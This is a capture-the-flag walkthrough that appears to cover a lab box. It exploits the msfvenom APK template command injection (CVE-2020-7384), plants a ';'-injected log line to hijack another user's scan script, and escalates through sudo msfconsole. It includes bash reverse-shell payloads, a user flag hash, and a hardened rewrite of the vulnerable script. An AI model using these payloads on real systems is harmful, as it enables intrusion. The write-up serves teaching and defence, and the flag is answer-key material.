Created Aug 13, 2021
Nmap scan

Open ports: 22/ssh and 5000/http ![[Pasted image 20210416211309.png]]

Visiting port 5000 in a browser: ![[Pasted image 20210416211429.png]]

File upload in "Template file" ==> command injection in msfvenom ==> RCE

The upload form hands the file to msfvenom as an APK template, which is the bug covered by the Metasploit module exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection (CVE-2020-7384). From the module description:

This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x

Generate the APK with the module, upload it as the "Template file", and the command set in the module runs on the box when msfvenom processes the template.


Listener and the reverse-shell command used as the module's payload:

```
nc -nvlp 1337
payload = 'bash -c "/bin/bash -i >& /dev/tcp/ 0>&1"'
```

Got foothold (user kid)

![[Pasted image 20210416211608.png]]

user flag: c3728a7c05e95bb566784da579a2c887

Second user (pwn)

A script run by pwn reads a log file and scans every IP listed in it (the relevant part):

```bash
cd /home/pwn/
# $log is assigned earlier in the script (not captured in these notes)
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```

Everything after the second space-separated field of each log line is pasted unquoted into the string handed to `sh -c`, so a log line with a `;` in its third field or later runs arbitrary commands as pwn. The log is writable from the kid shell, and the web app's searchsploit input also ends up in it, which gives two ways to plant such a line.

POC (touch a file in /home/pwn/)

Append a line to the log as kid. `cut -d' ' -f3-` throws away the first two space-separated fields, so the `;` must start the third field (note the space before it); with `t t;touch ...` the `;` belongs to field 2 and is cut away with it.

```bash
vim /home/kid/hacker
t t ;touch hhh.txt;
```

The same thing works by putting `;` into the searchsploit user input of the web app. For a shell as pwn, append the reverse-shell line instead:

```bash
echo "t t ;bash -c '/bin/bash -i >& /dev/tcp/ 0>&1';" >> /home/kid/hacker
```
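The injection in the pwn script and the field-position detail of the POC, reproduced as an added example (this is not the box's script or the author's POC): constructed log lines are run through a loop shaped like the original, with `true` standing in for nmap so nothing is scanned, beside a hardened loop that validates the field and never hands it to `sh -c`. The fixture directory, the file names and the log contents are all made up for the example.

```bash
#!/bin/bash
# Added example, not the box's own scanlosers.sh: a harmless reproduction of
# the injection in the pwn script beside a hardened loop. `true` stands in for
# nmap so nothing is scanned; the directory and log contents are constructed.

# Create a throwaway work dir with a log file and the recon/ output dir.
# Lines 1-2: honest entries (fields 1-2 are what `cut -f3-` discards).
# Line 3: the `;` sits in field 2 and is cut away, so no injection.
# Line 4: the `;` starts field 3 and survives into the sh -c string.
make_fixture() {
    local work
    work=$(mktemp -d)
    mkdir -p "$work/recon"
    cat > "$work/hackers" <<'EOF'
x x 10.10.14.5
x x 10.10.14.5
t t;touch nope.txt;
t t ;touch pwned.txt;
EOF
    printf '%s\n' "$work"
}

# Vulnerable loop, same shape as the original (minus the `&`, so the result
# is deterministic): the field is pasted unquoted into the string handed to
# `sh -c`, so sh re-parses any `;` in it. Runs in a subshell so the caller's
# cwd is untouched. Prints "injected" if the smuggled `touch` ran, else "clean".
vulnerable_scan() (
    cd "$1" || exit 1
    cut -d' ' -f3- hackers | sort -u | while read -r ip; do
        sh -c "true --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" 2>/dev/null
    done
    [ -e pwned.txt ] && echo injected || echo clean
)

# Hardened loop: accept only a dotted-quad IPv4 field, skip everything else,
# and pass the value as a single quoted argument instead of through a shell
# string, so the shell never re-parses log content.
hardened_scan() (
    cd "$1" || exit 1
    cut -d' ' -f3- hackers | sort -u | while read -r ip; do
        if ! printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
            printf 'rejected log entry: %s\n' "$ip" >&2
            continue
        fi
        true --top-ports 10 -oN "recon/${ip}.nmap" "$ip" >/dev/null 2>&1
    done
    [ -e pwned.txt ] && echo injected || echo clean
)

# Usage: run each variant against its own fixture.
work=$(make_fixture); echo "vulnerable: $(vulnerable_scan "$work")"; rm -rf "$work"
work=$(make_fixture); echo "hardened:   $(hardened_scan "$work")"; rm -rf "$work"
```

The vulnerable run creates pwned.txt but not nope.txt, which is the point about field position: a `;` in the second field never reaches the shell. The hardened run creates neither, and the rejected entries show up on stderr.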

![[Pasted image 20210416235654.png]]


![[Pasted image 20210416235635.png]]

Easy privesc: pwn can run `sudo /opt/metasploit-framework-6.0.9/msfconsole`, and msfconsole lets you run system commands from its prompt (e.g. typing `bash` at the msf prompt), so that gives a root shell. The installed 6.0.9 is also inside the vulnerable range noted above.

![[Pasted image 20210416235933.png]]
